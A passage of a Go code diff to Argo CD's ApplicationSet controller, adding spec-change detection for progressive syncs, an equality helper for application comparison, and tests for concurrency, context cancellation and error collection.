
 // removeFinalizerOnInvalidDestination removes the Argo CD resources finalizer if the application contains an invalid target (eg missing cluster)
@@ -967,7 +1046,7 @@ func (r *ApplicationSetReconciler) removeOwnerReferencesOnDeleteAppSet(ctx conte
 func (r *ApplicationSetReconciler) performProgressiveSyncs(ctx context.Context, logCtx *log.Entry, appset argov1alpha1.ApplicationSet, applications []argov1alpha1.Application, desiredApplications []argov1alpha1.Application) (map[string]bool, error) {
 	appDependencyList, appStepMap := r.buildAppDependencyList(logCtx, appset, desiredApplications)

-	_, err := r.updateApplicationSetApplicationStatus(ctx, logCtx, &appset, applications, appStepMap)
+	_, err := r.updateApplicationSetApplicationStatus(ctx, logCtx, &appset, applications, desiredApplications, appStepMap)
 	if err != nil {
 		return nil, fmt.Errorf("failed to update applicationset app status: %w", err)
 	}
@@ -1144,10 +1223,16 @@ func getAppStep(appName string, appStepMap map[string]int) int {
 }

 // check the status of each Application's status and promote Applications to the next status if needed
-func (r *ApplicationSetReconciler) updateApplicationSetApplicationStatus(ctx context.Context, logCtx *log.Entry, applicationSet *argov1alpha1.ApplicationSet, applications []argov1alpha1.Application, appStepMap map[string]int) ([]argov1alpha1.ApplicationSetApplicationStatus, error) {
+func (r *ApplicationSetReconciler) updateApplicationSetApplicationStatus(ctx context.Context, logCtx *log.Entry, applicationSet *argov1alpha1.ApplicationSet, applications []argov1alpha1.Application, desiredApplications []argov1alpha1.Application, appStepMap map[string]int) ([]argov1alpha1.ApplicationSetApplicationStatus, error) {
 	now := metav1.Now()
 	appStatuses := make([]argov1alpha1.ApplicationSetApplicationStatus, 0, len(applications))

+	// Build a map of desired applications for quick lookup
+	desiredAppsMap := make(map[string]*argov1alpha1.Application)
+	for i := range desiredApplications {
+		desiredAppsMap[desiredApplications[i].Name] = &desiredApplications[i]
+	}
+
 	for _, app := range applications {
 		appHealthStatus := app.Status.Health.Status
 		appSyncStatus := app.Status.Sync.Status
@@ -1182,10 +1267,27 @@ func (r *ApplicationSetReconciler) updateApplicationSetApplicationStatus(ctx con
 		newAppStatus := currentAppStatus.DeepCopy()
 		newAppStatus.Step = strconv.Itoa(getAppStep(newAppStatus.Application, appStepMap))

-		if !reflect.DeepEqual(currentAppStatus.TargetRevisions, app.Status.GetRevisions()) {
-			// A new version is available in the application and we need to re-sync the application
+		revisionsChanged := !reflect.DeepEqual(currentAppStatus.TargetRevisions, app.Status.GetRevisions())
+
+		// Check if the desired Application spec differs from the current Application spec
+		specChanged := false
+		if desiredApp, ok := desiredAppsMap[app.Name]; ok {
+			// Compare the desired spec with the current spec to detect non-Git changes
+			// This will catch changes to generator parameters like image tags, helm values, etc.
+			specChanged = !cmp.Equal(desiredApp.Spec, app.Spec, cmpopts.EquateEmpty(), cmpopts.EquateComparable(argov1alpha1.ApplicationDestination{}))
+		}
+
+		if revisionsChanged || specChanged {
 			newAppStatus.TargetRevisions = app.Status.GetRevisions()
-			newAppStatus.Message = "Application has pending changes, setting status to Waiting"
+
+			switch {
+			case revisionsChanged && specChanged:
+				newAppStatus.Message = revisionAndSpecChangedMsg
+			case revisionsChanged:
+				newAppStatus.Message = revisionChangedMsg
+			default:
+				newAppStatus.Message = specChangedMsg
+			}
 			newAppStatus.Status = argov1alpha1.ProgressiveSyncWaiting
 			newAppStatus.LastTransitionTime = &now
 		}
--- a/applicationset/controllers/applicationset_controller_test.go
+++ b/applicationset/controllers/applicationset_controller_test.go
@@ -25,6 +25,7 @@ import (
 	ctrl "sigs.k8s.io/controller-runtime"
 	crtclient "sigs.k8s.io/controller-runtime/pkg/client"
 	"sigs.k8s.io/controller-runtime/pkg/client/fake"
+	"sigs.k8s.io/controller-runtime/pkg/client/interceptor"
 	"sigs.k8s.io/controller-runtime/pkg/controller/controllerutil"
 	"sigs.k8s.io/controller-runtime/pkg/event"

@@ -1077,6 +1078,70 @@ func TestCreateOrUpdateInCluster(t *testing.T) {
 				},
 			},
 		},
+		{
+			name: "Ensure that unnormalized live spec does not cause a spurious patch",
+			appSet: v1alpha1.ApplicationSet{
+				ObjectMeta: metav1.ObjectMeta{
+					Name:      "name",
+					Namespace: "namespace",
+				},
+				Spec: v1alpha1.ApplicationSetSpec{
+					Template: v1alpha1.ApplicationSetTemplate{
+						Spec: v1alpha1.ApplicationSpec{
+							Project: "project",
+						},
+					},
+				},
+			},
+			existingApps: []v1alpha1.Application{
+				{
+					TypeMeta: metav1.TypeMeta{
+						Kind:       application.ApplicationKind,
+						APIVersion: "argoproj.io/v1alpha1",
+					},
+					ObjectMeta: metav1.ObjectMeta{
+						Name:            "app1",
+						Namespace:       "namespace",
+						ResourceVersion: "2",
+					},
+					Spec: v1alpha1.ApplicationSpec{
+						Project: "project",
+						// Without normalizing the live object, the equality check
+						// sees &SyncPolicy{} vs nil and issues an unnecessary patch.
+						SyncPolicy: &v1alpha1.SyncPolicy{},
+					},
+				},
+			},
+			desiredApps: []v1alpha1.Application{
+				{
+					ObjectMeta: metav1.ObjectMeta{
+						Name:      "app1",
+						Namespace: "namespace",
+					},
+					Spec: v1alpha1.ApplicationSpec{
+						Project:    "project",
+						SyncPolicy: nil,
+					},
+				},
+			},
+			expected: []v1alpha1.Application{
+				{
+					TypeMeta: metav1.TypeMeta{
+						Kind:       application.ApplicationKind,
+						APIVersion: "argoproj.io/v1alpha1",
+					},
+					ObjectMeta: metav1.ObjectMeta{
+						Name:            "app1",
+						Namespace:       "namespace",
+						ResourceVersion: "2",
+					},
+					Spec: v1alpha1.ApplicationSpec{
+						Project:    "project",
+						SyncPolicy: &v1alpha1.SyncPolicy{},
+					},
+				},
+			},
+		},
 		{
 			name: "Ensure that argocd pre-delete and post-delete finalizers are preserved from an existing app",
 			appSet: v1alpha1.ApplicationSet{
@@ -1186,6 +1251,374 @@ func TestCreateOrUpdateInCluster(t *testing.T) {
 	}
 }

+func TestCreateOrUpdateInCluster_Concurrent(t *testing.T) {
+	scheme := runtime.NewScheme()
+	err := v1alpha1.AddToScheme(scheme)
+	require.NoError(t, err)
+
+	appSet := v1alpha1.ApplicationSet{
+		ObjectMeta: metav1.ObjectMeta{
+			Name:      "name",
+			Namespace: "namespace",
+		},
+	}
+
+	t.Run("all apps are created correctly with concurrency > 1", func(t *testing.T) {
+		desiredApps := make([]v1alpha1.Application, 5)
+		for i := range desiredApps {
+			desiredApps[i] = v1alpha1.Application{
+				ObjectMeta: metav1.ObjectMeta{
+					Name:      fmt.Sprintf("app%d", i),
+					Namespace: "namespace",
+				},
+				Spec: v1alpha1.ApplicationSpec{Project: "project"},
+			}
+		}
+
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(&appSet).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			Build()
+		metrics := appsetmetrics.NewFakeAppsetMetrics()
+
+		r := ApplicationSetReconciler{
+			Client:                       fakeClient,
+			Scheme:                       scheme,
+			Recorder:                     record.NewFakeRecorder(10),
+			Metrics:                      metrics,
+			ConcurrentApplicationUpdates: 5,
+		}
+
+		err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, desiredApps)
+		require.NoError(t, err)
+
+		for _, desired := range desiredApps {
+			got := &v1alpha1.Application{}
+			require.NoError(t, fakeClient.Get(t.Context(), crtclient.ObjectKey{Namespace: desired.Namespace, Name: desired.Name}, got))
+			assert.Equal(t, desired.Spec.Project, got.Spec.Project)
+		}
+	})
+
+	t.Run("non-context errors from concurrent goroutines are collected and one is returned", func(t *testing.T) {
+		existingApps := make([]v1alpha1.Application, 5)
+		initObjs := []crtclient.Object{&appSet}
+		for i := range existingApps {
+			existingApps[i] = v1alpha1.Application{
+				TypeMeta: metav1.TypeMeta{
+					Kind:       application.ApplicationKind,
+					APIVersion: "argoproj.io/v1alpha1",
+				},
+				ObjectMeta: metav1.ObjectMeta{
+					Name:            fmt.Sprintf("app%d", i),
+					Namespace:       "namespace",
+					ResourceVersion: "1",
+				},
+				Spec: v1alpha1.ApplicationSpec{Project: "old"},
+			}
+			app := existingApps[i].DeepCopy()
+			require.NoError(t, controllerutil.SetControllerReference(&appSet, app, scheme))
+			initObjs = append(initObjs, app)
+		}
+
+		desiredApps := make([]v1alpha1.Application, 5)
+		for i := range desiredApps {
+			desiredApps[i] = v1alpha1.Application{
+				ObjectMeta: metav1.ObjectMeta{
+					Name:      fmt.Sprintf("app%d", i),
+					Namespace: "namespace",
+				},
+				Spec: v1alpha1.ApplicationSpec{Project: "new"},
+			}
+		}
+
+		patchErr := errors.New("some patch error")
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(initObjs...).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
+					return patchErr
+				},
+			}).
+			Build()
+		metrics := appsetmetrics.NewFakeAppsetMetrics()
+
+		r := ApplicationSetReconciler{
+			Client:                       fakeClient,
+			Scheme:                       scheme,
+			Recorder:                     record.NewFakeRecorder(10),
+			Metrics:                      metrics,
+			ConcurrentApplicationUpdates: 5,
+		}
+
+		err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, desiredApps)
+		require.ErrorIs(t, err, patchErr)
+	})
+}
+
+func TestCreateOrUpdateInCluster_ContextCancellation(t *testing.T) {
+	scheme := runtime.NewScheme()
+	err := v1alpha1.AddToScheme(scheme)
+	require.NoError(t, err)
+
+	appSet := v1alpha1.ApplicationSet{
+		ObjectMeta: metav1.ObjectMeta{
+			Name:      "name",
+			Namespace: "namespace",
+		},
+	}
+	existingApp := v1alpha1.Application{
+		TypeMeta: metav1.TypeMeta{
+			Kind:       application.ApplicationKind,
+			APIVersion: "argoproj.io/v1alpha1",
+		},
+		ObjectMeta: metav1.ObjectMeta{
+			Name:            "app1",
+			Namespace:       "namespace",
+			ResourceVersion: "1",
+		},
+		Spec: v1alpha1.ApplicationSpec{Project: "old"},
+	}
+	desiredApp := v1alpha1.Application{
+		ObjectMeta: metav1.ObjectMeta{
+			Name:      "app1",
+			Namespace: "namespace",
+		},
+		Spec: v1alpha1.ApplicationSpec{Project: "new"},
+	}
+
+	t.Run("context canceled on patch is returned directly", func(t *testing.T) {
+		initObjs := []crtclient.Object{&appSet}
+		app := existingApp.DeepCopy()
+		err = controllerutil.SetControllerReference(&appSet, app, scheme)
+		require.NoError(t, err)
+		initObjs = append(initObjs, app)
+
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(initObjs...).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
+					return context.Canceled
+				},
+			}).
+			Build()
+		metrics := appsetmetrics.NewFakeAppsetMetrics()
+
+		r := ApplicationSetReconciler{
+			Client:   fakeClient,
+			Scheme:   scheme,
+			Recorder: record.NewFakeRecorder(10),
+			Metrics:  metrics,
+		}
+
+		err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
+		require.ErrorIs(t, err, context.Canceled)
+	})
+
+	t.Run("context deadline exceeded on patch is returned directly", func(t *testing.T) {
+		initObjs := []crtclient.Object{&appSet}
+		app := existingApp.DeepCopy()
+		err = controllerutil.SetControllerReference(&appSet, app, scheme)
+		require.NoError(t, err)
+		initObjs = append(initObjs, app)
+
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(initObjs...).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
+					return context.DeadlineExceeded
+				},
+			}).
+			Build()
+		metrics := appsetmetrics.NewFakeAppsetMetrics()
+
+		r := ApplicationSetReconciler{
+			Client:   fakeClient,
+			Scheme:   scheme,
+			Recorder: record.NewFakeRecorder(10),
+			Metrics:  metrics,
+		}
+
+		err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
+		require.ErrorIs(t, err, context.DeadlineExceeded)
+	})
+
+	t.Run("non-context error is collected and returned after all goroutines finish", func(t *testing.T) {
+		initObjs := []crtclient.Object{&appSet}
+		app := existingApp.DeepCopy()
+		err = controllerutil.SetControllerReference(&appSet, app, scheme)
+		require.NoError(t, err)
+		initObjs = append(initObjs, app)
+
+		patchErr := errors.New("some patch error")
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(initObjs...).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
+					return patchErr
+				},
+			}).
+			Build()
+		metrics := appsetmetrics.NewFakeAppsetMetrics()
+
+		r := ApplicationSetReconciler{
+			Client:   fakeClient,
+			Scheme:   scheme,
+			Recorder: record.NewFakeRecorder(10),
+			Metrics:  metrics,
+		}
+
+		err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
+		require.ErrorIs(t, err, patchErr)
+	})
+
+	t.Run("context canceled on create is returned directly", func(t *testing.T) {
+		initObjs := []crtclient.Object{&appSet}
+
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(initObjs...).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Create: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.CreateOption) error {
+					return context.Canceled
+				},
+			}).
+			Build()
+		metrics := appsetmetrics.NewFakeAppsetMetrics()
+
+		r := ApplicationSetReconciler{
+			Client:   fakeClient,
+			Scheme:   scheme,
+			Recorder: record.NewFakeRecorder(10),
+			Metrics:  metrics,
+		}
+
+		newApp := v1alpha1.Application{
+			ObjectMeta: metav1.ObjectMeta{Name: "newapp", Namespace: "namespace"},
+			Spec:       v1alpha1.ApplicationSpec{Project: "default"},
+		}
+		err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{newApp})
+		require.ErrorIs(t, err, context.Canceled)
+	})
+}
+
+func TestDeleteInCluster_ContextCancellation(t *testing.T) {
+	scheme := runtime.NewScheme()
+	err := v1alpha1.AddToScheme(scheme)
+	require.NoError(t, err)
+	err = corev1.AddToScheme(scheme)
+	require.NoError(t, err)
+
+	appSet := v1alpha1.ApplicationSet{
+		ObjectMeta: metav1.ObjectMeta{
+			Name:      "name",
+			Namespace: "namespace",
+		},
+	}
+	existingApp := v1alpha1.Application{
+		TypeMeta: metav1.TypeMeta{
+			Kind:       application.ApplicationKind,
+			APIVersion: "argoproj.io/v1alpha1",
+		},
+		ObjectMeta: metav1.ObjectMeta{
+			Name:            "delete-me",
+			Namespace:       "namespace",
+			ResourceVersion: "1",
+		},
+		Spec: v1alpha1.ApplicationSpec{Project: "project"},
+	}
+
+	makeReconciler := func(t *testing.T, fakeClient crtclient.Client) ApplicationSetReconciler {
+		t.Helper()
+		kubeclientset := kubefake.NewClientset()
+		clusterInformer, err := settings.NewClusterInformer(kubeclientset, "namespace")
+		require.NoError(t, err)
+		cancel := startAndSyncInformer(t, clusterInformer)
+		t.Cleanup(cancel)
+		return ApplicationSetReconciler{
+			Client:          fakeClient,
+			Scheme:          scheme,
+			Recorder:        record.NewFakeRecorder(10),
+			KubeClientset:   kubeclientset,
+			Metrics:         appsetmetrics.NewFakeAppsetMetrics(),
+			ClusterInformer: clusterInformer,
+		}
+	}
+
+	t.Run("context canceled on delete is returned directly", func(t *testing.T) {
+		app := existingApp.DeepCopy()
+		err = controllerutil.SetControllerReference(&appSet, app, scheme)
+		require.NoError(t, err)
+
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(&appSet, app).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
+					return context.Canceled
+				},
+			}).
+			Build()
+
+		r := makeReconciler(t, fakeClient)
+		err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
+		require.ErrorIs(t, err, context.Canceled)
+	})
+
+	t.Run("context deadline exceeded on delete is returned directly", func(t *testing.T) {
+		app := existingApp.DeepCopy()
+		err = controllerutil.SetControllerReference(&appSet, app, scheme)
+		require.NoError(t, err)
+
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(&appSet, app).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
+					return context.DeadlineExceeded
+				},
+			}).
+			Build()
+
+		r := makeReconciler(t, fakeClient)
+		err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
+		require.ErrorIs(t, err, context.DeadlineExceeded)
+	})
+
+	t.Run("non-context delete error is collected and returned", func(t *testing.T) {
+		app := existingApp.DeepCopy()
+		err = controllerutil.SetControllerReference(&appSet, app, scheme)
+		require.NoError(t, err)
+
+		deleteErr := errors.New("delete failed")
+		fakeClient := fake.NewClientBuilder().
+			WithScheme(scheme).
+			WithObjects(&appSet, app).
+			WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
+			WithInterceptorFuncs(interceptor.Funcs{
+				Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
+					return deleteErr
+				},
+			}).
+			Build()
+
+		r := makeReconciler(t, fakeClient)
+		err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
+		require.ErrorIs(t, err, deleteErr)
+	})
+}
+
 func TestRemoveFinalizerOnInvalidDestination_FinalizerTypes(t *testing.T) {
 	scheme := runtime.NewScheme()
 	err := v1alpha1.AddToScheme(scheme)
@@ -4799,6 +5232,12 @@ func TestUpdateApplicationSetApplicationStatus(t *testing.T) {
 		}
 	}

+	newAppWithSpec := func(name string, health health.HealthStatusCode, sync v1alpha1.SyncStatusCode, revision string, opState *v1alpha1.OperationState, spec v1alpha1.ApplicationSpec) v1alpha1.Application {
+		app := newApp(name, health, sync, revision, opState)
+		app.Spec = spec
+		return app
+	}
+
 	newOperationState := func(phase common.OperationPhase) *v1alpha1.OperationState {
 		finishedAt := &metav1.Time{Time: time.Now().Add(-1 * time.Second)}
 		if !phase.Completed() {
@@ -4815,6 +5254,7 @@ func TestUpdateApplicationSetApplicationStatus(t *testing.T) {
 		name              string
 		appSet            v1alpha1.ApplicationSet
 		apps              []v1alpha1.Application
+		desiredApps       []v1alpha1.Application
 		appStepMap        map[string]int
 		expectedAppStatus []v1alpha1.ApplicationSetApplicationStatus
 	}{
@@ -4968,14 +5408,14 @@ func TestUpdateApplicationSetApplicationStatus(t *testing.T) {
 			expectedAppStatus: []v1alpha1.ApplicationSetApplicationStatus{
 				{
 					Application:     "app1",
-					Message:         "Application has pending changes, setting status to Waiting",
+					Message:         revisionChangedMsg,
 					Status:          v1alpha1.ProgressiveSyncWaiting,
 					Step:            "1",
 					TargetRevisions: []string{"next"},
 				},
 				{
 					Application:     "app2-multisource",
-					Message:         "Application has pending changes, setting status to Waiting",
+					Message:         revisionChangedMsg,
 					Status:          v1alpha1.ProgressiveSyncWaiting,
 					Step:            "1",
 					TargetRevisions: []string{"next"},
@@ -5415,6 +5855,191 @@ func TestUpdateApplicationSetApplicationStatus(t *testing.T) {
 				},
 			},
 		},
+		{
+			name: "detects spec changes when image tag changes in generator (same Git revision)",
+			appSet: newDefaultAppSet(2, []v1alpha1.ApplicationSetApplicationStatus{
+				{
+					Application:     "app1",
+					Message:         "",
+					Status:          v1alpha1.ProgressiveSyncHealthy,
+					Step:            "1",
+					TargetRevisions: []string{"abc123"},
+				},
+			}),
+			apps: []v1alpha1.Application{
+				newAppWithSpec("app1", health.HealthStatusHealthy, v1alpha1.SyncStatusCodeOutOfSync, "abc123", nil, // Changed to OutOfSync
+					v1alpha1.ApplicationSpec{
+						Source: &v1alpha1.ApplicationSource{
+							RepoURL:        "https://example.com/repo.git",
+							TargetRevision: "master",
+							Helm: &v1alpha1.ApplicationSourceHelm{
+								Parameters: []v1alpha1.HelmParameter{
+									{Name: "image.tag", Value: "v1.0.0"},
+								},
+							},
+						},
+						Destination: v1alpha1.ApplicationDestination{
+							Server:    "https://kubernetes.default.svc",
+							Namespace: "default",
+						},
+					}),
+			},
+			desiredApps: []v1alpha1.Application{
+				newAppWithSpec("app1", health.HealthStatusHealthy, v1alpha1.SyncStatusCodeOutOfSync, "abc123", nil, // Changed to OutOfSync
+					v1alpha1.ApplicationSpec{
+						Source: &v1alpha1.ApplicationSource{
+							RepoURL:        "https://example.com/repo.git",
+							TargetRevision: "master",
+							Helm: &v1alpha1.ApplicationSourceHelm{
+								Parameters: []v1alpha1.HelmParameter{
+									{Name: "image.tag", Value: "v2.0.0"}, // Different value
+								},
+							},
+						},
+						Destination: v1alpha1.ApplicationDestination{
+							Server:    "https://kubernetes.default.svc",
+							Namespace: "default",
+						},
+					}),
+			},
+			appStepMap: map[string]int{
+				"app1": 0,
+			},
+			expectedAppStatus: []v1alpha1.ApplicationSetApplicationStatus{
+				{
+					Application:     "app1",
+					Message:         specChangedMsg,
+					Status:          v1alpha1.ProgressiveSyncWaiting,
+					Step:            "1",
+					TargetRevisions: []string{"abc123"},
+				},
+			},
+		},
+		{
+			name: "does not detect changes when spec is identical (same Git revision)",
+			appSet: newDefaultAppSet(2, []v1alpha1.ApplicationSetApplicationStatus{
+				{
+					Application:     "app1",
+					Message:         "",
+					Status:          v1alpha1.ProgressiveSyncHealthy,
+					Step:            "1",
+					TargetRevisions: []string{"abc123"},
+				},
+			}),
+			apps: []v1alpha1.Application{
+				newAppWithSpec("app1", health.HealthStatusHealthy, v1alpha1.SyncStatusCodeSynced, "abc123", nil,
+					v1alpha1.ApplicationSpec{
+						Source: &v1alpha1.ApplicationSource{
+							RepoURL:        "https://example.com/repo.git",
+							TargetRevision: "master",
+							Helm: &v1alpha1.ApplicationSourceHelm{
+								Parameters: []v1alpha1.HelmParameter{
+									{Name: "image.tag", Value: "v1.0.0"},
+								},
+							},
+						},
+						Destination: v1alpha1.ApplicationDestination{
+							Server:    "https://kubernetes.default.svc",
+							Namespace: "default",
+						},
+					}),
+			},
+			appStepMap: map[string]int{
+				"app1": 0,
+			},
+			// Desired apps have identical spec
+			desiredApps: []v1alpha1.Application{
+				{
+					ObjectMeta: metav1.ObjectMeta{
+						Name: "app1",
+					},
+					Spec: v1alpha1.ApplicationSpec{
+						Source: &v1alpha1.ApplicationSource{
+							RepoURL:        "https://example.com/repo.git",
+							TargetRevision: "master",
+							Helm: &v1alpha1.ApplicationSourceHelm{
+								Parameters: []v1alpha1.HelmParameter{
+									{Name: "image.tag", Value: "v1.0.0"}, // Same value
+								},
+							},
+						},
+						Destination: v1alpha1.ApplicationDestination{
+							Server:    "https://kubernetes.default.svc",
+							Namespace: "default",
+						},
+					},
+				},
+			},
+			expectedAppStatus: []v1alpha1.ApplicationSetApplicationStatus{
+				{
+					Application:     "app1",
+					Message:         "",
+					Status:          v1alpha1.ProgressiveSyncHealthy,
+					Step:            "1",
+					TargetRevisions: []string{"abc123"},
+				},
+			},
+		},
+		{
+			name: "detects both spec and revision changes",
+			appSet: newDefaultAppSet(2, []v1alpha1.ApplicationSetApplicationStatus{
+				{
+					Application:     "app1",
+					Message:         "",
+					Status:          v1alpha1.ProgressiveSyncHealthy,
+					Step:            "1",
+					TargetRevisions: []string{"abc123"}, // OLD revision in status
+				},
+			}),
+			apps: []v1alpha1.Application{
+				newAppWithSpec("app1", health.HealthStatusHealthy, v1alpha1.SyncStatusCodeOutOfSync, "def456", nil, // NEW revision, but OutOfSync
+					v1alpha1.ApplicationSpec{
+						Source: &v1alpha1.ApplicationSource{
+							RepoURL:        "https://example.com/repo.git",
+							TargetRevision: "master",
+							Helm: &v1alpha1.ApplicationSourceHelm{
+								Parameters: []v1alpha1.HelmParameter{
+									{Name: "image.tag", Value: "v1.0.0"},
+								},
+							},
+						},
+						Destination: v1alpha1.ApplicationDestination{
+							Server:    "https://kubernetes.default.svc",
+							Namespace: "default",
+						},
+					}),
+			},
+			desiredApps: []v1alpha1.Application{
+				newAppWithSpec("app1", health.HealthStatusHealthy, v1alpha1.SyncStatusCodeOutOfSync, "def456", nil,
+					v1alpha1.ApplicationSpec{
+						Source: &v1alpha1.ApplicationSource{
+							RepoURL:        "https://example.com/repo.git",
+							TargetRevision: "master",
+							Helm: &v1alpha1.ApplicationSourceHelm{
+								Parameters: []v1alpha1.HelmParameter{
+									{Name: "image.tag", Value: "v2.0.0"}, // Changed value
+								},
+							},
+						},
+						Destination: v1alpha1.ApplicationDestination{
+							Server:    "https://kubernetes.default.svc",
+							Namespace: "default",
+						},
+					}),
+			},
+			appStepMap: map[string]int{
+				"app1": 0,
+			},
+			expectedAppStatus: []v1alpha1.ApplicationSetApplicationStatus{
+				{
+					Application:     "app1",
+					Message:         revisionAndSpecChangedMsg,
+					Status:          v1alpha1.ProgressiveSyncWaiting,
+					Step:            "1",
+					TargetRevisions: []string{"def456"},
+				},
+			},
+		},
 	} {
 		t.Run(cc.name, func(t *testing.T) {
 			kubeclientset := kubefake.NewClientset([]runtime.Object{}...)
@@ -5434,7 +6059,11 @@ func TestUpdateApplicationSetApplicationStatus(t *testing.T) {
 				Metrics:       metrics,
 			}

-			appStatuses, err := r.updateApplicationSetApplicationStatus(t.Context(), log.NewEntry(log.StandardLogger()), &cc.appSet, cc.apps, cc.appStepMap)
+			desiredApps := cc.desiredApps
+			if desiredApps == nil {
+				desiredApps = cc.apps
+			}
+			appStatuses, err := r.updateApplicationSetApplicationStatus(t.Context(), log.NewEntry(log.StandardLogger()), &cc.appSet, cc.apps, desiredApps, cc.appStepMap)

 			// opt out of testing the LastTransitionTime is accurate
 			for i := range appStatuses {
@@ -7321,6 +7950,40 @@ func TestIsRollingSyncStrategy(t *testing.T) {
 	}
 }

+func TestFirstAppError(t *testing.T) {
+	errA := errors.New("error from app-a")
+	errB := errors.New("error from app-b")
+	errC := errors.New("error from app-c")
+
+	t.Run("returns nil for empty map", func(t *testing.T) {
+		assert.NoError(t, firstAppError(map[string]error{}))
+	})
+
+	t.Run("returns the single error", func(t *testing.T) {
+		assert.ErrorIs(t, firstAppError(map[string]error{"app-a": errA}), errA)
+	})
+
+	t.Run("returns error from lexicographically first app name", func(t *testing.T) {
+		appErrors := map[string]error{
+			"app-c": errC,
+			"app-a": errA,
+			"app-b": errB,
+		}
+		assert.ErrorIs(t, firstAppError(appErrors), errA)
+	})
+
+	t.Run("result is stable across multiple calls with same input", func(t *testing.T) {
+		appErrors := map[string]error{
+			"app-c": errC,
+			"app-a": errA,
+			"app-b": errB,
+		}
+		for range 10 {
+			assert.ErrorIs(t, firstAppError(appErrors), errA, "firstAppError must return the same error on every call")
+		}
+	})
+}
+
 func TestSyncApplication(t *testing.T) {
 	tests := []struct {
 		name     string
--- a/applicationset/utils/createOrUpdate.go
+++ b/applicationset/utils/createOrUpdate.go
@@ -24,6 +24,43 @@ import (
 	"github.com/argoproj/argo-cd/v3/util/argo/normalizers"
 )

+var appEquality = conversion.EqualitiesOrDie(
+	func(a, b resource.Quantity) bool {
+		// Ignore formatting, only care that numeric value stayed the same.
+		// TODO: if we decide it's important, it should be safe to start comparing the format.
+		//
+		// Uninitialized quantities are equivalent to 0 quantities.
+		return a.Cmp(b) == 0
+	},
+	func(a, b metav1.MicroTime) bool {
+		return a.UTC().Equal(b.UTC())
+	},
+	func(a, b metav1.Time) bool {
+		return a.UTC().Equal(b.UTC())
+	},
+	func(a, b labels.Selector) bool {
+		return a.String() == b.String()
+	},
+	func(a, b fields.Selector) bool {
+		return a.String() == b.String()
+	},
+	func(a, b argov1alpha1.ApplicationDestination) bool {
+		return a.Namespace == b.Namespace && a.Name == b.Name && a.Server == b.Server
+	},
+)
+
+// BuildIgnoreDiffConfig constructs a DiffConfig from the ApplicationSet's ignoreDifferences rules.
+// Returns nil when ignoreDifferences is empty.
+func BuildIgnoreDiffConfig(ignoreDifferences argov1alpha1.ApplicationSetIgnoreDifferences, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts) (argodiff.DiffConfig, error) {
+	if len(ignoreDifferences) == 0 {
+		return nil, nil
+	}
+	return argodiff.NewDiffConfigBuilder().
+		WithDiffSettings(ignoreDifferences.ToApplicationIgnoreDifferences(), nil, false, ignoreNormalizerOpts).
+		WithNoCache().
+		Build()
+}
+
 // CreateOrUpdate overrides "sigs.k8s.io/controller-runtime" function
 // in sigs.k8s.io/controller-runtime/pkg/controller/controllerutil/controllerutil.go
 // to add equality for argov1alpha1.ApplicationDestination
@@ -34,10 +71,15 @@ import (
 // cluster. The object's desired state must be reconciled with the existing
 // state inside the passed in callback MutateFn.
 //
